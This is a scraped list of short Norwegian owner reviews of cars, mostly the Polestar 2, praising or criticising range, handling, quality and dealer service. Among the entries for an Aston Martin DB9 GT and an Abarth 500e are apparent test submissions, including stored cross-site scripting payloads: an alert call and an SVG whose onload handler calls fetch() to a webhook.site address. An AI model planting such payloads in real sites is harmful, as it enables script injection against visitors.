Vurdert av ThomasB
Polestar 2 (2024)
Bra rekkevidde.
Polestar 2 (2024)
Mye bra på denne bilen, er totalt sett godt fornøyd. Gode og sportslige kjøreegenskaper, veldig bra på vinterføre, OK hengervekt (1500 kg), gode vindusviskere, utrolig gode lys. Går som ei kule.
Polestar 2 (2023)
Veldig fornøyd alt i alt. På plussiden er kjøreegenskapene og generelt god kvalitetsfølelse. Frydenbø har vært veldig gode å forholde seg til, både med småfeil og vanlig service. Likevel,
Polestar 2 (2023)
Har hatt denne bilen i 1,5 år uten noen problemer. Den er god å kjøre og kvaliteten føles bra. Holder seg godt i pris.
Polestar 2 (2023)
Jeg har eid litt over 40 biler, mange fra premium merker og kjørt ca 2,5 millioner kilometer gjennom årene. Dette er den desidert beste bil jeg hatt.
Polestar 2 (2022)
God kvalitetsfølelse. Gode (frem-) seter. Smart med OTA (oppdateringer over-the-air). Lett å selv restarte system og app etter behov. Pen bil! Praktisk med frunk for elkabler på langtur. (hvorfor h
Polestar 2 (2022)
Veldig godt fornøyd med bilen. Bortsett fra noe trøbbel med startbatteriet har bilen gått som en kule. Lettkjørt trygg bil med premium kjøreegenskaper. Super service hos Kverneland i Stavanger. K
Polestar 2 (2022)
Ekstremt godt fornøyd med bilen nydelig bil og kjøre ikke veldig høyt forbruk god plass for størrelsen
Polestar 2 (2022)
Sportslig preg og lite tull. Plass til barneseter, kjerring og barnevogn.
Polestar 2 (2022)
En fantastisk bil. Beste bilen jeg har hatt. Opplever at Frydenbø Bil er virkelig god på service. Derfor blir neste bil av samme merke.
Polestar 2 (2022)
Praktisk og god bil, men kvaliteten er godt under middels. Mange små problemer som skaper mye irritasjon. Rekkevidde/forbruk er så langt fra oppgitt som man kan komme. Ventetid på verksted er laaaa
Polestar 2 (2022)
Elsker alt ned denne bilen
Polestar 2 (2022)
Jeg får ikke lov av kona å bytte bil.... det sier vel det meste :)
Polestar 2 (2022)
Gjennomtenkt, sikker, pålitelig, tøft design, bra infotainment, hengerfeste, rask og morsom å kjøre.
Polestar 2 (2022)
Kanonbra bil
Aston Martin DB9 GT (2017)
alert("total")
Aston Martin DB9 GT (2017)
totalvurderingtest
Abarth 500e (2024)
Abarth 500e (2024)
Abarth 500e (2024)
xxxfooo4
Abarth 500e (2024)
<svg xmlns="http://www.w3.org/2000/svg" onload="fetch('https://webhook.site/418d388b-4676-4b57-95ba-4330be1ec311')"> <circle cx="50" cy="50" r="40" fill="red"/> </svg> <script>alert(1)</script>
Volvo EX40 (2026)
Dette er ikke en volvo som vi er kjent med volvo. Dårlige seter, umulig å opprettholde 20grader i kupe på vinter, kjapp på gasspedal, men enormt strømforbruk uansett hvordan du prøver å tilpass
Ford Explorer EV (2025)
Kommer nok til å bytte den ut pga den nervøse oppførselen på vinterføre. Utenom dette svarer den godt på alle parametre.
Ford Kuga (2021)
Forbruk. Gir en tier for forbruk langkjøring. 0,44 og forbruk 0,8 med campingvogn, totalvekt 1400 kg(ved tomt batteri). Rekkevidde elektrisk på vinter månedene er fra 20 - 30 km, blandet/bykjøring
Hongqi E-HS9 (2022)
Den er utrolig komfortabel, stille og har en kvalitet som overgår det meste på markedet. Har hatt bilen i 2år nå, å hele familien elsker bilen!
Mercedes-Benz EQC (2022)
Topp komfort og driftsikker.
Polestar 2 (2022)
God kvalitetsfølelse. Gode (frem-) seter. Smart med OTA (oppdateringer over-the-air). Lett å selv restarte system og app etter behov. Pen bil! Praktisk med frunk for elkabler på langtur. (hvorfor h
Mercedes-Benz GLE (2020)
Skuffende å måtte skifte opphengskuler foran på begge sider etter kun 75000 km
BMW 3-Serie (2012)
Hadde det vært et punkt som het eierglede så hadde jeg glatt gitt 10 av 10!! Bilen er vakker og tvers igjennom godt bygget! Nydelig å kjøre og det meste bærer preg av å være bygget med gode mat
MG ZS EV (2022)
Veldig godt fornøyd med bilen på alle måter tatt i betraktning at det var en forholdsvis rimelig bil.